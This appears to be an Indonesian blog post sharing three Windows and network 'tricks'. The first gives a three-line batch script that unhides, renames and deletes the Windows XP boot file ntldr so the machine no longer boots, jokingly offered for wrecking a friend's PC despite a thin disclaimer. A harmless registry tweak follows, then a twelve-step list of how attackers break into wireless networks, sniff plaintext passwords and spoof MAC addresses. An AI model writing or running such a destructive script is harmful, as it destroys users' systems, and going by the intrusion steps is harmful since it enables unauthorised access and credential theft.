Trik ini sangat berbahaya, saya hanya sekedar share saja untuk sekedar pengetahuan saja. Sebaiknya jangan digunakan untuk kejahatan apalgi merusak PC / laptop teman.
Jika ada salah satu di antara anda yang menggunakan trik ini untuk kejahatan saya tidak bertanggung jawab atas semua yang telah terjadi pada PC nya.

Buka notepad, lalu tulis script di bawah ini, yang berwarna merah saja jangan yang warna hitamnya ya.

attrib –s –h –r c:\ntldr <= mengubah atribut si ‘ntldr’ menjadi, system=false(-), hidden=false(-), readonly=false(-)

ren c:\ntldr mledukkomplu <= mengubah nama si ‘ntldr’ menjadi ‘mledukkomplu’

del c:\mledukkomplu <= karena saya suka ragu, saya hapus pula si mledukkomplu itu (ntldr)

Save dengan ekstensi .bat

Script diatas akan mengeset atribut file ‘ntldr’ yang merupakan ‘Jantung’ windows XP, menjadi –s –h –r [not system, not hidden, not read-only], jadi file akan muncul dan bisa di edit karena ‘read-only’ nya sudah dicopot.

Script ini akan merubah nama si ‘ntldr’ menjadi, ‘udahrusakgan’, nah, di baris ini, ntldr, sudah berubah jadi udahrusakgan, artinya, Jika anda shutdown computer anda, dan menyalakannya lagi, pada saat booting, file NTLDR tidak akan ditemukan karena namanya sudah berubah. Dan si XP akan minta di Reinstall!! wkwkwkwkkwkw !

Baris ketiga akan menghapus file ‘ntldr’ dari harddisk anda… wekekekekek…

Dengan ketiga sricpt di atas kita dapat mengancurkan windows xp tanpa berbayar, alias gratis.

INGAT !!!
JANGAN DI JALANKAN KARENA AKAN BERBAHAYA


Trik ini mungkin sebuah trik yang paling gampang dan mudah.
Saya share trik ini hanya sekedar mengisi kekosongan waktu saja sambil mencai topik yang bisa saya share.
Jika anda klik my computer di dektop atau pasti ada properties, nah jika anda ingin mendisable propertis di my computer cukup 3 langkah yang harus anda lakukan

1. ketik REGEDIT pada RUN selanjutnya HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer.
2. Klik kanan pilih REG_DWORD (DWORD Value) berinama NoPropertiesMyComputer
3. 0 untuk enable dan 1 untuk disable.

Sekian trik dari saya, semoga bermanfaat.



Seorang penyusup bisa menyusup ke dalam sistem menggunakan beberapa program gratisan bisa dengan mudahnya diperoleh di internet. Ia bahkan bisa menaklukkan sebuah jaringan nirkabel hanya dalam beberapa urutan langkah.
Dalam serangannya, ia bisa melakukan pemindahan massal terhadap seluruh perangkat jaringan yang diincarnya. Berikut adalah beberapa hal yang biasa dilakukan oleh Attacker untuk menaklukkan sebuah jaringan tanpa kabel :

  1. Melacak sinyal dari jarak jauh menggunakan kartu jaringan wireless menggunakan antenna tambahan di luar ruangan.
  2. Menjadi anonymous tak dikenal menggunakan firewall bawaan dari produk Microsoft atau peranti lain seperti ZoneAlarm dari Zone Lab untuk melindungi komputernya dari alat pemindai balik IDS (Intrusion Detection System).
  3. Mendapatkan IP Address, target access point, dan server DHCP (Dynamic Host Configuration Protocol) menggunakan aplikasi seperti Net Stumbler atau program wireless client lainnya.
  4. Mengeksploitasi kelemahan � kelamahan jaringan wireless dengan cara yang tidak jauh beda dengan yang dilakukan oleh penyusup jaringan pada umumnya. Biasanya Attacker mengincar dengan kesalahan-kesalahan umum, misalnya : default IP, default password, dll
  5. Dengan bantuan alat protocol analyzer, penyusup melakukan sniff gelombang udara, mengambil contoh data yang ada di dalamnya, dan mencari MAC Address dan IP Address yang valid yang bisa dihubungi.
  6. Mencuri data penting dari lalu lintas broadcast untuk memetakan jaringan target.
  7. Menggunakan peranti seperti Ethereal untuk membuka data yang didapat dari protokol-protokol transparan seperti Telnet, POP (Post Office Protocol), atau HTTP (HyperText Transfer Protocol) untuk mencari data otentikasi seperti username dan password.
  8. Menggunakan program lain, seperti SMAC, untuk melakukan spoofing MAC Address dan menangkap lebih banyak paket data dalam jaringan.
  9. Melakukan koneksi ke WLAN target.
  10. Memeriksa apakah ia telah mendapatkan IP Address atau tidak. Hal ini dilakukan penyusup secara pasif sehingga sangat sulit dideteksi.
  11. Menggunakan alat pemindai kelemahan system dan jaringan untuk menemukan kelemahan pada komputer-komputer pengguna, access point, atau perangkat lainnya.
  12. Melakukan eksplorasi jaringan untuk memetakan dan memperpanjang akes ke jaringan Wireless berikutnya.